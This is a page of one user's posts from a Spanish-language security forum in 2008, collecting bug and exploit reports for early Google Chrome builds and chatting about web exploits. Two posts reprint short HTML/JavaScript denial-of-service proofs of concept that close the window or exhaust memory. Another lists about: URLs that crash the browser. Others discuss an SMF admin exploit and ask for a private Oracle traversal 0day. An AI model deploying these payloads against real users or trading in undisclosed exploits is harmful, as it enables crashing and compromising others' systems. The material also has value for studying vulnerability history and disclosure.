elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 ... 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25 26 27 28 29 30
221  Seguridad Informática / Bugs y Exploits / Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 30 Septiembre 2008, 03:37 am
Versiones afectadas

Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27


fuente:http://www.milw0rm.com/exploits/6609

Remote DoS Exploit
Código:

<html>
<head>
<title>Google Chrome Window Object Suppressing Remote Denial of Service.</title>
</head>


<body onLoad="window.close();">
<center>
<b>Note: Design Flaw.Zero Security Check. Script Can Be Used to Kill Parent Window Directly Leading to Denial of Service.</b><br><br>
</center>
</body>
</html>
222  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 25 Septiembre 2008, 03:15 am
Nuevo Exploit en milw0rm

Versiones afectadas

Chrome/0.2.149.29
Chrome/0.2.149.30



Código:
<html>
<title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.</title>
<head>
<script language="javascript">

window.open("\r\n\r\n");
window.refresh();
window.open("\r\n\r\n");


</script>
</head>

<body><br><br>
<h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</br></br> </center></h2>


<center>
<b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br>

<hr></hr>
<b>This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example:
using alert function will make it more exhaustive.</b></br></br>

<b><br>Aditya K Sood<br> (c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></br></b>
<hr></hr></center>
<b>Version Tested:<br><br>Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13
 <br><br>

Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13
</b>
<hr></hr>
</body>

</html>


-berz3k.

223  Seguridad Informática / Nivel Web / Re: w3af - Web Application Attack and Audit Framework en: 23 Septiembre 2008, 18:29 pm
Gracias por la info, creo mucho tester ya lo conoces, estamos en la lista de developers y ademas somos beta testers de otras tools de webapp.

Muy recomendable la version para Linux, pues existen alguna fallitas en la version win32

-berz3k.
224  Seguridad Informática / Nivel Web / Re: Yourownbux v4.0 => Cookie Modification Exploit en: 13 Septiembre 2008, 21:16 pm
XDD, esta a simple vista la injection nice! good bug

PD: Creo que su blogroll de tec-n0x hay personajes no queridos XDD

-berz3k.
225  Seguridad Informática / Nivel Web / Re: Quieres ser admin en un foro SMF 1.1.5? en: 12 Septiembre 2008, 02:30 am
Kool, he bajado las versiones mas viejas ya les comento

PD: Me habia olvidado por completo de google+hacks

-berz3k.

226  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 9 Septiembre 2008, 14:37 pm
Google fixea vulnerabilidades en su navegador Chrome

Google Releases New Browser Chrome - Vulnerabilities on First Day

So as most of you probably know the big buzz on the Internet last week was that Google (after supporting Firefox for so long) have actually launched their own browser.

It’s cooled Google Chrome. Now of course in typical Google fashion they call it BETA software, and a number of flaws have popped up during the first couple of days of release.

One cool thing though is that each tab runs it’s own threaded process, so if one tab bombs out it won’t take down your whole browser.

The browser is a move for Google into the online/offline integration they started with Google Desktop, there are more and more online apps (Google Office) that people still want to use offline with a Google made browser this will be possible.

You also have to consider the privacy implications though, if you are also using Gmail…Google will basically know everything you do, even worse if you also use Google Desktop they will know what you have on your computer, what e-mail you send and receive and what you surf on the web.


Curioso video donde los ciudadanos Alemanes no usaran Chrome, lo olvide postear antes:

http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chrome

Abra que testear lo nuevo de Chrome.

-berz3k.



227  Seguridad Informática / Nivel Web / Re: Howto o paper sobre busqueda de bugs en el código de aplicaciones web? en: 9 Septiembre 2008, 13:13 pm
Vaya,

Yo puedo recomendar OWASP y OSSTMM, que seguramente ya lo haz encontrado, cada company y cliente tiene sus metodologias para realizar algun tipo de test, code review black/white box etc, al final la gente tecnica y cliente son los que definen los alcances , entregables etc, para ello se escoge gente de cierto nivel para NO entregar la conocida "paja" que muchas veces es lo que hacen algunas consultoras ganando bastante "pasta" que no quiero ni mencionar nombres, igualmente ciertas areas de seguridad de Corps y grandes Bancos, obviamente sin generalizar , solo mi punto de vista...

PD: J_F_C tendras que formular tus preguntas mas precisas antes de postear algo que seguramente encontraras en google.com, un cordial saludo.


-berz3k.

228  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 8 Septiembre 2008, 15:11 pm

Portal dedicado a las vulnerabilidades de Chrome:

Código:
Google Chrome Silent Crash Exploit
Google Chrome Inspect Element DoS Exploit
Google Chrome Buffer Overflow
Google Chrome Invalid URL Crash
Google Chrome Omnibox Keylogger
Google Chrome Comic Book
Uninstalling Chrome - Is it something we said.
Google Chrome Carpet Bombing Vulnerability
Chrome Keyboard Shortcuts
Chrome Easter Eggs
Google Chrome Released

Muy gracioso los comics, ademas los Chrome Easter Eggs, como todo programa oculta los credits y demas sopresas, pero tambien informacion valiosa para  algun atacante:

Código:
about:internets
about:version
about:stats
about:memory
about:plugins
about:histograms
about:cache
about:dns
about:network
about:crash
about:hang (can crash your browser)
about:% (can crash your browser)

Me resulto bastante bueno al ejecutar "about:memory" la cantidad de memoria que consume Firefox comparado con Chrome.

fuente: http://chromekb.com

-berz3k.





229  Seguridad Informática / Nivel Web / Re: OC4J Directory Traversal priv8 en: 8 Septiembre 2008, 13:38 pm
UTF8 ? mmmm que curioso mmmm tengo apps en ORACLE y el port puede variar, tendre que probar y/o si tienes algo "underground" dale private msg XDD


PD: 0day r0x, pero menciona los vectores de ataque que usaste para llegar al bug, el de Tomacat UTF8 Traversal hasta ahora no me ha funcionado en win32, pero veo que puede estar chido el 0day de ORACLE we!

-berz3k.
230  Seguridad Informática / Nivel Web / Re: Quieres ser admin en un foro SMF 1.1.5? en: 8 Septiembre 2008, 13:24 pm
Todo lo tengo en linux y parece que la version en win32 esta parchada, si alguien tiene la version vulnerable de la que estamos hablando para win32, postee link de descarga.

-berz3k.
Páginas: 1 ... 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 [23] 24 25 26 27 28 29 30
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines